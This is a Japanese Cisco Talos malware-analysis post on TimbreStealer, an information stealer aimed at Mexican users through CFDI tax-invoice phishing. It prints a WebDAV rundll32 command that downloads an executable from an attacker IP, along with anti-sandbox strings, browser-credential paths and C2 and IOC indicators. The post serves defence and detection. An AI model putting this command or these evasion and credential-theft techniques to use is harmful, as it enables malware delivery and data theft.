Cisco Japan Blog

お金に関係していると思わせてメキシコのユーザーを狙う TimbreStealer 攻撃

4 min read



  • Cisco Talos は、未知のマルウェアをばらまく新たな攻撃を発見し、同マルウェアを「TimbreStealer」と命名しました。
  • 攻撃者は、スパム攻撃によって TimbreStealer を配布しています。メキシコの税金に関連した内容のスパムメールを使用した攻撃で、遅くとも 2023 年 11 月には始まっています。この攻撃者は以前、同様の戦術、手法、手順(TTP)を使用して「Mispadu」というバンキング型トロイの木馬を拡散していました。
  • TimbreStealer は難読化された新しい情報窃取マルウェアであり、メキシコのユーザーを狙っていると考えられます。
  • TimbreStealer には、マルウェアバイナリのオーケストレーション、復号、保護に使用される複数のモジュールが埋め込まれています。

Talos は、メキシコの潜在的な被害者を狙ったフィッシングスパム攻撃が続いていることを確認しています。ユーザーを誘導して難読化された新しい情報窃盗マルウェア(Talos では TimbreStealer と命名)をダウンロードさせるという手口です。遅くとも 2023 年 11 月には攻撃が始まっています。この攻撃では、お金に関係していると思わせるフィッシングメールを使用して、ペイロードがホストされている侵害された Web サイトにユーザーを誘導し、悪意のあるアプリケーションを実行させます。

Talos は、同じ攻撃者による新しいスパム攻撃が遅くとも 2023 年 9 月から行われていることを確認しています。当初は、バンキング型トロイの木馬である Mispadu の亜種が、特定の地域からのみアクセスできるように設定された WebDAV サーバーを使って配布されていました。その後、ペイロードが今回の新しい情報窃取マルウェアに変更されています。新しい情報窃取マルウェアに変わってからは、Mispadu が使用された形跡は見つかっていません。

このフィッシング攻撃ではジオフェンシング手法を使用してメキシコのユーザーのみを攻撃対象にしており、メキシコ以外の場所からペイロードサイトに接続しようとすると、悪意のあるファイルではなく空の PDF ファイルが返されます。現在拡散されているスパムメールの内容は主に、CFDI というメキシコのデジタル納税に必要な領収書兼請求書に関するものでした(CFDI は「Comprobante Fiscal Digital por Internetpopup_icon」の略で、オンラインで発行されるデジタルインボイスのことです)。また、一般的な請求書に関する内容のメールも同じ攻撃で使用されていることを Talos では確認しています。

2 つの攻撃につながりがあることを示す確かな証拠は見つけられませんでしたが、今回の攻撃と以前の Mispadu を配布popup_iconする攻撃では同じ TTP が使用されていることと、TimbreStealer の配布が始まってからは Mispadu が使用された形跡がないことから、同じ攻撃者の仕業であると Talos はほぼ確信しています。

難読化された新たな情報窃取マルウェア TimbreStealer

Talos は、2023 年 11 月に始まったメキシコのユーザーを標的にしたスパム攻撃の調査中に、情報窃盗マルウェアの新ファミリを特定しました。TimbreStealer という名前はこの攻撃で使用されているスパムメールの内容に由来します。攻撃については後ほど分析します。

TimbreStealer は、検出を回避し、密かに攻撃を仕掛け、侵害を受けたシステムに潜み続けるために高度な一連の手法を用います。たとえば、通常行われている API の監視をバイパスするためにシステムコールを直接実行する、Heaven’s Gatepopup_icon の手口を使って 64 ビットコードを 32 ビットプロセス内で実行する、カスタムローダーを利用する、といった手法です。このような特徴からも非常に巧妙に仕組まれていることがうかがえ、高度な技術を持つ作成者がこれらのコンポーネントを内製していると思われます。

Heaven’s Gate を使用した 64 ビットへの切り替えを示すコードのスニペット

これから分析するサンプルは、スパムメール内のリンクをクリックして侵害された Web サイトを訪れた被害者のマシンで見つかったものです。

このブログの分析で使用したサンプル

分析の結果、マルウェアの「.data」セクションに埋め込まれた複数のモジュールのほか、メインのオーケストレーション DLL とグローバル復号キーを使用する複雑な復号プロセスを特定しました。このキーは異なるモジュール間で使用され、各段階で更新されます。この分析はまだ完了していませんが、最初のいくつかのモジュールとモジュール間の関係だけでも説明したいと思います。

TimbreStealer の復号プロセス

第 1 レイヤの実行ファイルは圧縮されており、「.data」セクションに DLL が埋め込まれています。ローダーはまず Ntdll をスキャンしてすべての Zw* エクスポートを検索し、関数の順序付きハッシュテーブルを作成します。ここからは、機密性の高い API はすべて、カーネルに対して直接システムコールを実行することによって呼び出されます。このとき 64 ビットマシンの場合は、syscall を実行する前に Heaven’s Gate を使用して 32 ビットモードから 64 ビットモードに変換されます。

API の使用を隠すために TimbreStealer が使用する、システムコールを実行する 2 通りの方法を示すコードのスニペット

この処理が終わると、次は .data セクションから、次段階のペイロードを復号します。復号された DLL は MZ ヘッダーと PE シグニチャが消去されていますが、これはこのマルウェアで一貫して使用される手法です。ここでカスタム PE ローダーが先程の DLL を起動し、エクスポートされた関数に Zw* ハッシュテーブルを引数として渡します。

すべてのサブモジュールの復号には、グローバル復号キーが使用されます。マルウェアの実行が進むにつれ、このキーは何度も暗号化されます。想定されている実行のパスの手順を 1 つでも外れると復号キーは同期しなくなり、後続の復号はすべて失敗します。

リバースエンジニアがロジックを省略して強制復号したり、静的に引数を抽出してペイロードにアクセスしたりできないようになっているので、分析を回避するためのチェックをすべて突き止め、無効化しなければなりません。グローバルキーの暗号化ラウンドはコードのあちこちに書き込まれており、別のサブモジュールの中から始まる場合もあります。

このマルウェアでは、すべての段階で同じコーディングスタイルと手法が使われています。このことからも、すべての難読化レイヤと最終ペイロードは同じ作成者が開発した可能性が高いと考えられます。

TimbreStealer の埋め込みモジュール

最初のレイヤを抽出すると、TimbreStealer は攻撃対象として相応しいシステムか、また実行環境がサンドボックスかどうかをチェックします。さらに、ペイロードに埋め込まれている多数のサブモジュールを抽出します。メインのペイロードが抽出された後に、Talos は少なくとも 3 種類のレイヤを特定しました。各レイヤにはさまざまな機能のための複数のモジュールがあります。

TimbreStealer のモジュール間の関係性を示す図

このマルウェアの第 2 段階はオーケストレータのレイヤであり、攻撃対象となるシステムを検出し、後続のすべてのモジュールを抽出する役割を担います。システムが攻撃対象となるか判断するために、マルウェアはまずシステムの言語がロシア語でないことを確認し、次にタイムゾーンが中南米のいずれかの地域に設定されていることを確認します。その後、CsrGetProcessId デバッガチェックを実行し、デスクトップの子ウィンドウの数をカウントして、実行環境がサンドボックスではないことを確認します。

この段階でマルウェアはミューテックスチェックも行い、以前に感染した可能性を示すファイルやレジストリキーがないかを調べ、ブラウザをスキャンして自然な使い方がされているかを確認します。マルウェアがチェックするファイルとレジストリキーの一部を以下に示します。

  • HKLM\SOFTWARE\Microsoft\CTF\TIP\{82AA36AD-864A-2E47-2E76-9DED47AFCDEB}
    • {A0E67513-FF6B-419F-B92F-45EE8E03AEEE} = <value>
    • {E77BA8A1-71A1-C475-4F73-8C78F188ACA7} = <value>
    • {DB2D2D69-9EE0-9A3C-2924-67021A31F870} = <value>
    • {6EF3E193-61BF-4F68-9736-51CF6905709D} = <value>
    • {3F80FA11-1693-4D05-AA83-D072E69B77FC} = <value>
    • {419EEE13-5039-4FA4-942A-ADAE5D4ED5C3} = <value>
  • C:\Windows\Installer\{E1284A06-8DFA-48D4-A747-28ECD07A2966}
  • Global\I4X1R6WOG6LC7APSPY1YAXZWJGK70AZARZEGFT3U

上述のチェックのほか、これらのキーがあった場合は、マルウェアのこれ以降の段階は実行されません。

オーケストレータにはその他 4 つの暗号化されたサブモジュールが含まれます。

IDX サイズ CRC32 目的
0 8kb 0xF25BEB22 シンボル情報がない DLL 用のシェルコードローダー
1 100kb 0xEB4CD3EC DLL – 未分析
2 60kb 0xFA4AA96B DLL – 仮想マシン対策と分析回避のためのチェック、攻撃対象にするシステムかのチェック
3 3.92mb 0xAB029A74 DLL – 暗号化されたペイロードを含むインストーラ

すべての BLOB は親ローダー関数を通じてアクセスされます。この関数はデータの予想される Zlib CRC32 ハッシュを確認し、指定があれば raw データを圧縮解除することもできます。この全体アーキテクチャがすべてのレイヤで確認されました。

シンボル情報がない各 DLL はカスタムのシェルコードローダーによってサブモジュール 0 番(IDX = 0)からロードされます。このシェルコードに、ZwCreateThreadEx API を使って Heaven’s Gate のスタブ経由で実行が転送されます。

埋め込まれたシェルコードモジュールを TimbreStealer が実行する方法を示すコードのスニペット

サブモジュール 2 番は分析回避のための DLL で、複数のチェックを行い、グローバル復号バッファのさまざまな領域で暗号化ラウンドを実行します。チェックが 1 つでも失敗すると、インストーラモジュールは正しく復号できません。このレイヤでは以下のチェックが行われます。

  • VMware のフックとポートのチェック
  • デバッガを検出するための Vpcext、IceBP、int 2D 命令
  • 物理ドライブに次の文字列があるかのチェック:qemu、virtual、vmware、vbox、xensrc、sandbox、geswall、bufferzone、safespace、virtio、harddisk_ata_device、disk_scsi_disk_device、disk_0_scsi_disk_device、nvme_card_pd、google_persistentdisk

これらのチェックがすべて想定どおりに完了すると、最終モジュールを正常に復号できます。

サブモジュール 3 番はインストーラレイヤで、複数のファイルをディスクにドロップして実行をトリガーします。疑いを招かないように無害な偽ドキュメントも表示されます。

攻撃対象のマシンであることが確認された後に、ペイロードのインストーラモジュールがドロップしたファイル

ITaskService COM インターフェイスを介してタスクを登録することによって実行がトリガーされます。スケジュールされたタスクは Microsoft の reg.exe を使用して、一度だけ実行されるレジストリキーを追加します。その後、rundll32.exe をトリガーしてシステムの iernonce.dll を通じてこのエントリを処理します。

インストールされた DLL を実行するためのスケジュールされたタスクの設定

一定の条件下では、このレイヤはグループポリシーのオプションを変更して起動スクリプトを設定することも可能です。

インストールされた TimbreStealer の DLL モジュール

インストールされた Cecujujajofubo475.dll という名前の DLL は、上述の最初の DLL と同じ全体アーキテクチャを使用します。内部の文字列はすべて暗号化されており、グローバル復号バッファを用います。また、別の Zw* API ハッシュテーブルを使用して直接 syscall を実行することによってユーザー API を回避します。

このレイヤには、グローバル復号バッファの暗号化をさらに複雑にするための TLS コールバックもあります。第三者のマシンでの分析を防ぐために、上記のレジストリキー内の親プロセスの名前と値に応じた暗号化の追加ラウンドも加えられています。

この DLL には、8 つの暗号化されたサブモジュールが含まれています。

IDX サイズ CRC32 目的
0 0x1000 0x2B80E901 5 つの引数を受け入れる単一の XOR 関数
1 0x1000 0x520200E8 x64 シェルコードの PE ローダー
2 0x2000 0x105542F7 x86 シェルコードの PE ローダー
3 0x2000 0xC4ECE0A8 不明なシェルコード
4 0x7600 0xC1384E15 不明なモジュール(他の BLOB の圧縮解除に使用されると思われる)
5 0xD800* 0x1D38B250 仮想マシン対策とサンドボックスのレイヤ
6 0x1B600* 0x4F1FEFE3 メインのペイロードを抽出する x86 DLL
7 0x1EE00* 0xF527AC18 メインのペイロードを抽出する x64 DLL

* が付いているものは、復号後に BLOB が圧縮解除されます。列に表示されているのは圧縮解除後のサイズです。

この DLL にはインストール段階で確認されたものと同じ保護機能の多くが含まれていますが、このレイヤではさらにいくつかの保護機能が特定されています。その 1 つめは、ZwTraceEvent API へのパッチpopup_iconで、Windows データ収集のユーザーモードでのイベントトレースを無効化します。

もう 1 つ興味深いのは、プロセス内にロードされているすべての DLL(2 段階)を、そのディスクからのクリーンなコピーで上書きする保護機能です。これにより、ウイルス対策ベンダーのユーザーモードのフック、ソフトウェアのブレークポイント、ユーザーによるパッチが、実行中にすべて消去されます。

この DLL は、前の関係図で示した ApplicationIcon.ico ファイルに入っている最終ペイロードのローダーとしての役割を担います。サブモジュール 7 番は、サブモジュールが起動を試みるデフォルトのローダーになります。この 64 ビット DLL を svchost.exe プロセスの優先リストに挿入しようとします。

優先順位は svchost.exe プロセスのコマンドラインに基づいており、以下の文字列を探します。

  • DcomLaunch
  • Power
  • BrokerInfrastructure
  • LSM
  • Schedule

svchost.exe プロセスへの挿入が失敗した場合は、バックアップの 32 ビットのフォールバックシェルコードも使用できます。このモードでは、2 段階のシェルコードがサブモジュール 6 番からロードされて実行を受け継ぎます。コンテキストが変更された syscall を使って新しいスレッドが作成され、その後 ResumeThread が実行をトリガーします。シェルコードのメモリの割り当てもすべて、先に設定されている syscall を使用して実行されます。

シェルコードの第 1 段階が第 2 段階を復号し、その後 ApplicationIcon.ico ファイルから最終ペイロードとなる DLL を抽出して復号します。32 ビットバージョンはここでもカスタム PE ローダーを使用して、最終ペイロードとなる DLL を直接ロードして、抽出後に自身のプロセス内で実行します。

TimbreStealer の最終ペイロードモジュール

このレイヤのアーキテクチャはこれまでのアーキテクチャと同じで、さらに 9 つのサブモジュールが含まれます。この最終ペイロードモジュールとサブモジュールの分析は、この記事の執筆時点ではまだ継続中です。

IDX サイズ CRC32 目的
0 0X1000 0X2B80E901 5 つの引数を受け入れる単一の XOR 関数。1 つ前のレイヤの BLOB 0 番と同じ
1 0X1000 0X520200E8 x64 シェルコードの PE ローダー。1 つ前のレイヤの BLOB 1 番と同じ
2 0X2000 0X105542F7 x86 シェルコードの PE ローダー。1 つ前のレイヤの BLOB 2 番と同じ
3 0X2000 0XC4ECE0A8 不明なシェルコード。1 つ前のレイヤの BLOB 3 番と同じ
4 0XA5000* 0XB0214A74 未分析
5 0x13CC00* 0xE8421ADE 未分析
6 0x16800* 0xD30A298E 未分析
14 0x16600* 0x55BFB99 未分析
15 0x7C800* 0x2F6F928D 未分析

* が付いているものは、復号後に BLOB が圧縮解除されます。列に表示されているのは圧縮解除後のサイズです。

このモジュールから復号できた文字列を基に、現時点で分析できたマルウェアの機能を以下に示します。このマルウェアにはマシンからさまざまな情報を収集し、外部の Web サイトにデータを POST 送信する機能があることがうかがえます。これは、情報窃盗マルウェアの典型的な動作です。

被害者のマシンからログイン情報を収集する

ファイルやディレクトリをスキャンする関数からは以下の文字列が見つかりました。このモジュールには SQLite ライブラリも埋め込まれており、さまざまなブラウザのログイン情報保存ファイルを管理できるようになっています。

  • CloudManagementEnrollmentToken
  • Google\\Chrome Beta\\User Data
  • Google\\Chrome Dev\\User Data
  • Google\\Chrome SxS\\User Data
  • Google\\Chrome\\User Data
  • Google\\Policies
  • Microsoft\\Edge Beta\\User Data
  • Microsoft\\Edge Dev\\User Data
  • Microsoft\\Edge\\User Data
  • Software\\Google\\Chrome
  • Software\\Google\\Chrome\\Enrollment
  • Software\\Google\\Enrollment
  • Software\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}
  • SOFTWARE\\Microsoft\\Cryptography
  • Software\\Policies\\Google\\Chrome
  • Software\\Policies\\Google\\Update
  • history
  • feeds
  • feeds cache
  • internet explorer
  • media player
  • office
  • OneDrive
  • packages
  • Skydrive
  • Formhistory.sqlite
  • SELECT count(`place_id`) FROM `moz_historyvisits` WHERE `place_id` = %I64u;
  • SELECT `id`, `url`, `visit_count` FROM `moz_places` WHERE `last_visit_date`
  • Mozilla\\Firefox\\Profiles\\
  • Thunderbird\\Profiles\\
  • Postbox\\Profiles\\
  • PostboxApp\\Profiles\\
  • SOFTWARE\\Mozilla\\Mozilla Firefox
  • SOFTWARE\\Mozilla\\Mozilla Thunderbird
  • SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList

ファイルを検索する

マルウェアは、複数のディレクトリをスキャンしてファイルの検索も行いますが、その目的はまだ分かっていません。以下にリストしているように、AdwCleaner、Avast Scanner、360 Antivirus の隔離フォルダに関連するフォルダが対象に含まれています。

それ以外で興味深いのは「.Spotlight-V100」と「.fseventsd」で、両方とも MacOS に関連する文字列です。

  • $360Section
  • $AV_ASW
  • $GetCurrent
  • $Recycle.Bin
  • $SysReset
  • $WinREAgent
  • .fseventsd
  • .Spotlight-V100
  • AdwCleaner
  • AMD
  • Autodesk
  • boot
  • Brother
  • Config.Msi
  • Documents and Settings
  • EFI
  • Hewlett-Packard
  • inetpub
  • Intel
  • MSOCache
  • PerfLogs
  • Program Files
  • Program Files (x86)
  • ProgramData
  • Recovery
  • RecoveryImage
  • Resources
  • SWSetup
  • System Volume Information
  • SYSTEM.SAV
  • ~MSSETUP.T
  • $WINDOWS.
  • AutoKMS
  • KMSAuto
  • Users
  • AppData\\Local
  • AppData\\Roaming
  • Desktop
  • Documents
  • Downloads
  • OneDrive
  • Dropbox

OS の情報を収集する

TimbreStealer は Windows Management Instrumentation(WMI)インターフェイスとレジストリキーを使用して、現在実行中のマシンに関する豊富な情報を収集します。

  • OS 情報:Description、IdentifyingNumber、Manufacturer、Name、Product、ReleaseDate、InstallDate、InstallTime
  • SMB BIOS 情報:SMBIOSBIOSVersion、SMBIOSMajorVersion、SMBIOSMinorVersion、SerialNumber、Vendor、Version
  • ハードウェア情報:Win32_ComputerSystemProduct、Win32_BaseBoard、Win32_Bios、Win32_PhysicalMemory
  • ネットワークドメイン情報:StandaloneWorkstation、MemberWorkstation、StandaloneServer、MemberServer、BackupDomainController、PrimaryDomainController
  • アプリケーション情報:DisplayName、Publisher、DisplayVersion、OSArchitecture

ファイル拡張子を検索する

特定のファイル拡張子の検索も行います。なお、下記の「.zuhpgmcf」は既知のどのファイルタイプにも関連しない拡張子です。マルウェア自体が作成したファイルの可能性も考えられます。

  • .bak, .fbk, .dat, .db, .cmp, .dbf, .fdb, .mdf, .txt, .cer, .ods, .xls, .xlsx, .xml, .zuhpgmcf

アクセスされた URL を検索する

以下の文字列はマルウェアが検索対象にする URL を表しています。ネットワークパケットをキャプチャするための仮想デバイスの名前もあり、マルウェアがネットワークスニッフィングを行う可能性も考えられます。

  • npf
  • npcap
  • npcap_wifi
  • www.google.com
  • amazon.com
  • dropbox.com
  • linkedin.com
  • twitter.com
  • wikipedia.org
  • facebook.com
  • login.live.com
  • apple.com
  • www.paypal.com

システム保護を無効化する

マルウェアは、マシン上のシステム復元ポイントを削除するために使用する関数の呼び出しを実行します。Talos ではまだ感染したマシン上でランサムウェアのアクティビティは確認していませんが、これはランサムウェア型のマルウェアによく見られる動作です。この仮説が正しいか結論づけるには、さらなる分析が必要です。

  • SELECT * FROM SystemRestore
  • SequenceNumber
  • SrClient.dll
  • SRRemoveRestorePoint
  • SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Power
  • HiberbootEnabled

リモート デスクトップ ソフトウェアを検索する

マルウェアはリモート デスクトップ サーバーが使用するサービスやミューテックスへのアクセスを試みます。ただし、これがペイロードコードの中でどのように使用されるのかはまだ明確になっていません。

  • console
  • TermService
  • Global\\TermSrvReadyEvent
  • winlogon.exe
  • console

リモートサイトにデータを POST する

ネットワークにアクセスする関数の中で、URL と HTTP 通信で使用される文字列がいくつか見つかりました。これらの URL は TimbreStealer の配布に使用される他の URL とはフォーマットが異なります。おそらくこれらの URL や文字列はマルウェアが使用するコマンドアンドコントロール サーバーであると思われますが、これまでのところ、Talos が分析したサンプルはこのいずれとも通信していません。

  • POST
  • PUT
  • Content-Disposition: form-data; name=”
  • “; filename=”
  • “\\r\\nContent-Type: application/octet-stream\\r\\n
  • Content-Type: multipart/form-data; boundary=
  • Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  • Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
  • HTTP/1.1 200 OK\\r\\nDate: %s %s GMT\\r\\nConnection: Close\\r\\nAccess-Control-Allow-Origin: *\\r\\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept\\r\\nContent-Type: text/plain;charset=UTF-8\\r\\n\\r\\n
  • https://hamster69[.]senac2021[.]org/~armadillo492370/https://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/https://69[.]64[.]35[.]1/~route649289/

これらの文字列は解明の糸口に過ぎず、本当の目的を理解するためには最終ペイロードとその埋め込みモジュールについてもっと分析が必要です。

過去の Mispadu スパム攻撃

現在行われている配布攻撃に関連した活動が最初に観察されたのは 2023 年 9 月で、脅威グループは Mispadupopup_icon 情報窃盗マルウェアの亜種を配布していました。この攻撃では侵害された Web サイトを使って Zip アーカイブを配布しており、その中の「.url」ファイルを被害者がダブルクリックすると、WebDAV ファイルパスを使用して外部でホストされているファイルを実行するようになっていました。

Mispadu 攻撃で使用されたインターネット ショートカット(.url)ファイル

どちらの URL もリモート UNC パスで、ポート「@80」を指定して WebDAV 経由で強制接続を行っています。この接続は Rundll32.exe によって実行され、下記の例に示すパラメータが使用されています。

  • rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 159[.]89[.]50[.]225@80 http://159[.]89[.]50[.]225/formato23/9577710738/1242144429.exe 

この攻撃では、すべての WebDAV サーバーが、メキシコにある IP アドレスからのみ接続を許可するように設定されていました。

.url ファイルにはさまざまな名前が付けられていましたが、ほとんどの場合、Registro Federal de Contribuyentes(連邦納税者登録)の略である「RFC」が含まれていました。このことからお金に関係することだと思わせようとしていることがうかがえます。また多くの場合、.url ファイル名には 6 桁の乱数が含まれていました。

Mispadu のペイロードには、通信プロトコルとして HTTPS を使用する C2 のアドレスがハードコーディングされていました。さまざまな C2 の URL が使用され、時間とともに変化してはいますが、「f」と「w」という 2 つのパラメータを持ち「it.php」を指すという類似パターンが続いています。

  • hxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010
  • hxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9&w=Windows%2010
  • hxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2&w=Windows%2010
  • hxxps://manderlyx[.]com/cruto/it.php?f=2&w=Windows%2010
  • hxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2&w=Windows%2010

この攻撃が活発だったのは 11 月中旬までで、この頃、新しい TimbreStealer ペイロードが侵害された Web サイトから被害者のコンピュータにドロップされました。

この攻撃の標的となる業界はさまざまな業種にわたっていますが、以下のように製造業と輸送がやや集中して狙われています。

Mispadu 攻撃で最も狙われた業界を示すグラフ

CFDI をおとりに利用したスパム攻撃

Talos は 11 月中旬頃から、CFDI の PDF 文書に見せかけた悪意のあるファイルをダウンロードさせて実行させようとする少量のスパムメールを検出していました。この攻撃は 2024 年 2 月現在もまだ続いています。CFDIpopup_icon はメキシコの税務申告で提出が義務付けられている電子インボイスの規格です。この攻撃では、スパムメールに誘導されたユーザーが、侵害された Web サイトでホストされている悪意のある Web ページにリダイレクトされていました。

新しい TimbreStealer マルウェアを配布するスパムメールの例

この攻撃で確認された件名は同じく CFDI 関連のものでした。

  • Recibió un Comprobante Fiscal Digital (CFDI). Folio Fiscal: fcd7bf2f-e800-4ab3-b2b8-e47eb6bbff8c
  • Recibió una Factura. Folio Fiscal: 050e4105-799f-4d17-a55d-60d1f9275288

この Web サイトは JavaScript を使用しており、地理位置情報やブラウザの種類といったユーザーの特性を検出してから .url ファイルを含む Zip ファイルのダウンロードを開始します。それが完了すると、WebDAV を使って最初の TimbreStealer ドロッパーのダウンロードが始まります。Zip ファイルにはたいていの場合、同じく CFDI 関連の名前が付けられていました。

  • CFDI_930209.zip
  • FACTURA_560208.zip

アクセスがメキシコからでない場合は、悪意のあるペイロードの代わりに空の PDF ファイルが返されます。

最初のドロッパーマルウェアがダウンロードされるサイトをユーザーが訪問した後に表示されるメッセージ

現在の攻撃で使用されている URL はすべて同様のフォーマットを使用しています。

  • hxxps://<some>.<compromised>[.]<web>/<token>/<14_char_hex_id>

上記の <token> には、「cfdi」、「factura」、「timbreDigital」、「facdigital」、「seg_factura」のいずれかの文字列が入ります。また、ドメインの始めの部分はデジタルインボイスに関連するランダムなスペイン語の単語で、その後に数字が 2 つ続きます。

  • hxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977
  • hxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508
  • hxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5
  • hxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9

今回の .url ファイルはウイルス対策製品に検出されにくくするためにさらに難読化されていますが、一方で、悪意のあるファイルのダウンロードには依然として HTTP 経由の WebDAV が使用され、アイコンは PDF ファイルの表示になっています。

TimbreStealer 攻撃で使用されているインターネット ショートカット(.url)ファイル

マルウェアを実行するには、ユーザーの操作(ダウンロードされた Zip ファイルを開き、.url ファイルをダブルクリック)が必要です。この操作を行った時点で、TimbreStealer の主な感染が始まります。

TimbreStealer 攻撃で使用されている ATT&CK TTP

ATT&CK ID 説明
T1566.002popup_icon スピアフィッシング攻撃リンク
T1566.001popup_icon 添付ファイルによるスピアフィッシング攻撃
T1204.002popup_icon 悪意のあるファイル
T1105popup_icon 侵入ツールの転送
T1190popup_icon 外部公開されたアプリケーションへの攻撃
T1071.001popup_icon Web プロトコル
T1036.005popup_icon 偽装:正規の名称や場所に合致
T1483popup_icon ドメイン生成アルゴリズム
T1071popup_icon アプリケーション層プロトコル
T1027.009popup_icon 難読化されたファイルまたは情報:埋め込みペイロード
T1027.010popup_icon 難読化されたファイルまたは情報:コマンドの難読化
T1027.002popup_icon 難読化されたファイルまたは情報:ソフトウェアパッキング
T1564.001popup_icon アーティファクトの非表示:非表示ファイルとディレクトリ
T1497.003popup_icon 仮想環境/サンドボックスの回避:時間ベースの回避
T1497.001popup_icon 仮想環境/サンドボックスの回避:システムチェック
T1497.002popup_icon 仮想環境/サンドボックスの回避:ユーザー アクティビティ ベースのチェック
T1055.002popup_icon プロセスインジェクション:PE インジェクション
T1055.001popup_icon プロセスインジェクション:DLL インジェクション
T1055.012popup_icon プロセスインジェクション:プロセスの空洞化
T1140popup_icon ファイルまたは情報の難読化/デコード
T1574.002popup_icon ハイジャック実行フロー:DLL サイドローディング
T1082popup_icon システム情報の検出
T1486popup_icon データ暗号化による被害
T1070.001popup_icon 痕跡の削除:Windows イベントログのクリア
T1012popup_icon レジストリのクエリ
T1140popup_icon ファイルまたは情報の難読化/デコード
T1204popup_icon ユーザーによる実行:悪意のあるファイル
T1053.003popup_icon スケジュール設定されたタスク/ジョブ:Cron
T1053.005popup_icon スケジュール設定されたタスク/ジョブ:スケジュール設定されたタスク
T1547.001popup_icon 起動時またはログオン時の自動実行:レジストリの実行キー/スタートアップフォルダ
T1112popup_icon レジストリの変更

カバレッジ

今回の脅威は、以下の製品で検出してブロックすることが可能です。

Cisco Secure Endpoint(旧 AMP for Endpoints)は、この記事で説明したマルウェアの実行を阻止するのに最適です。Cisco Secure Endpoint の無料トライアルはこちらからお申し込みください。

Cisco Secure Web Appliance の Web スキャンは、悪意のある Web サイトへのアクセスを防止し、上述したような攻撃で使用されるマルウェアを検出します。

Cisco Secure Email(旧 E メールセキュリティ)は、攻撃の一環として攻撃者が送りつける不正な電子メールをブロックします。Cisco Secure Email の無料トライアルはこちらからお申し込みください。

Threat Defense Virtual適応型セキュリティアプライアンスMeraki MX など、Cisco Secure Firewall(旧次世代ファイアウォールおよび Firepower NGFW)アプライアンスは、この脅威に関連する悪意のあるアクティビティを検出できます。

Cisco Secure Malware Analytics(Threat Grid)は、悪意のあるバイナリを特定し、シスコのすべてのセキュリティ製品に保護機能を組み込みます。

Umbrella(シスコのセキュア インターネット ゲートウェイ(SIG))は、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。Umbrella の無料トライアルはこちらからpopup_iconお申し込みください。

Cisco Secure Web Appliance(旧 Web セキュリティアプライアンス)は、危険性のあるサイトを自動的にブロックし、ユーザーがアクセスする前に疑わしいサイトを検査します。

特定の環境および脅威データに対する追加の保護機能は、Firewall Management Center から入手できます。

Cisco Duopopup_icon は、ユーザーに多要素認証を提供し、承認されたユーザーのみがネットワークにアクセスできるようにします。

オープンソースの Snort サブスクライバルールセットをお使いであれば、Snort.orgpopup_icon で購入可能な最新のルールパックをダウンロードすることで、最新状態を維持できます。

この脅威を検出する Snort SID は、63057 ~ 63072 と 300840 ~ 300844 です。

今回の脅威に関連するマルウェアアーティファクトを検出するために、以下の ClamAV シグネチャがリリースされました。

  • Win.Infostealer.TimbreStealer-10021027-0
  • Win.Infostealer.TimbreStealer-10021026-0
  • Win.Infostealer.Generic-10017202-0
  • Win.Packed.Generic-10019162-0
  • Win.Dropper.Generic-10017203-0

IOC(侵入の痕跡)

この調査の IOC は、こちらpopup_iconの GitHub リポジトリで提供しています。

潜在的な C2 URL

hxxps://hamster69[.]senac2021[.]org/~armadillo492370/
hxxps://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/
hxxps://69[.]64[.]35[.]1/~route649289/

IP

24[.]199[.]98[.]128

159[.]89[.]50[.]225

104[.]131[.]169[.]252

104[.]131[.]67[.]109

137[.]184[.]108[.]25

137[.]184[.]115[.]230

138[.]197[.]34[.]162

142[.]93[.]50[.]216

143[.]244[.]144[.]166

143[.]244[.]160[.]115

146[.]190[.]208[.]30

157[.]230[.]238[.]116

157[.]245[.]8[.]79

159[.]223[.]96[.]160

159[.]89[.]226[.]127

159[.]89[.]90[.]109

162[.]243[.]171[.]207

167[.]71[.]24[.]13

167[.]71[.]245[.]175

167[.]71[.]246[.]120

192[.]241[.]141[.]137

24[.]144[.]96[.]15

45[.]55[.]65[.]159

64[.]225[.]29[.]249

ドロップサイト URL

hxxp://folio24[.]spacefordailyrituals[.]com/facdigital/55ae12184283dc

hxxp://folio47[.]marcialledo[.]com/seg_factura/e6bab6d032e282

hxxp://pdf43[.]marcialledo[.]com/factura/50e1e86db86ff2

hxxp://suscripcion95[.]servicioslomex[.]online/cfdi/0faa4a21fff2bb

hxxps://0[.]solucionegos[.]top/timbreDigital/e99522f778ea6a

hxxps://auditoria38[.]meinastrohoroskop[.]com/factura/b5b0c16b999573

hxxps://auditoria42[.]altavista100[.]com/factura/b20569ae393e7e

hxxps://auditoria67[.]mariageorgina[.]com/cfdi/bb743b25f5c526

hxxps://auditoria7[.]miramantolama[.]com/factura/d84d576baf1513

hxxps://auditoria82[.]taoshome4sale[.]com/seg_factura/efebfc104991d4

hxxps://auditoria84[.]meinastrohoroskop[.]com/timbreDigital/8f7b2f8304d08e

hxxps://auditoria88[.]mariageorgina[.]com/factura/3db4832ada4f80

hxxps://auditoria89[.]venagard[.]com/timbreDigital/f6a5f34123d980

hxxps://auditoria92[.]venagard[.]com/factura/2c6652a143f815

hxxps://auditoria93[.]serragrandreunion[.]com/timbreDigital/a2e79b61ac4635

hxxps://comprobante14[.]miramantolama[.]com/seg_factura/fb0b02b2d41b12

hxxps://comprobante2[.]marcialledo[.]com/factura/3ce069ac2b865e

hxxps://comprobante27[.]mariageorgina[.]com/timbreDigital/eada68119275aa

